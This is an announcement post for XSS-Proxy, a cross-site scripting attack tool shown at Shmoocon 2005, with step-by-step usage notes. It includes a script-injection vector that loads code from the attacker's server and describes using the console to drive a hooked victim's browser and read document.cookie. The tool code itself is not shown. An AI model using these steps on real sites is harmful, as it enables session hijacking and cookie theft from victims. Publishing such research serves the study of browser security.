Announcing XSS-Proxy

I have uploaded my demo code from Shmoocon 2005. I'll be putting a more descriptive page, instructions, whitepaper and shmoocon slides up over the next few days.

Here's an overview on using the tool
1 - modify the perl script vars $code_server and $PORT to point to the system that you will be running the perl script on. (defaults to port 80 and http://localhost )
2 - run the perl script and point the attack browser at /admin on the server you are running the perl script. (with defaults would be http://localhost/admin\). This is the attacker admin console.
3 - the initialization URL a victim needs to point to is /xss2.js - Your initial XSS vector needs to point back to the perl server and this filename (ie for XSSing your own browser with local code server, enter <script src="http://localhost/xss2.js"></script>)
4 - after you have a victim initialized and in a wait loop, you can either browse the / document of the XSS site and click on links you want the victim to visit and forward back, or you can enter documents/variables in the associated form inputs.

Admin Commands and operation.
- the console does not refresh/update on it's own. you need to press the refesh/reload button in your browser.
- javascript is not required to run the console and it may be safer to disable for the attacker console. I've XSS'd myself a few times with some advanced testing.
- sessions will show up in sessions section once they get XSSd.
- each session should forward a copy of the "/" directory off the XSS'd server
- forwarded documents are listed in the "Document Results" section. If you click on a document, it will rewrite the URLs and clicks within that document will make the proxy request the same client load the link
- if it's a form, then you need to make sure the last page that client loaded is the same page, then fill out values and submit form. Some URL re-writing is happening here as well.
- you can also do document loads manually by entering the URL in the "Fetch Document" form. first value (left) is the session number, and second is the document to retrieve (ie - 0 and http://xssed.com/stuff\)
- the other form called "Evaluate" is for querying javascript vars/functions from specific clients. Enter session on left and var on right (ie - 0 and document.cookie to display cookies for session 0)
- results of evaluate requests will appear in the "Eval Results" section
- errors from page loads and evaluate requests will appear in the "Errors" section

There's a few bugs in the code still, so read the initial comments in the controller script to see what it may have issues with. The attack works with IE and Firefox browsers (with some additional tweaks other browsers may work) and the perl script runs on most any OS with a basic Perl install. I've tested it on Linux and Windows (Activestate Perl).

Have fun.

Anton Rager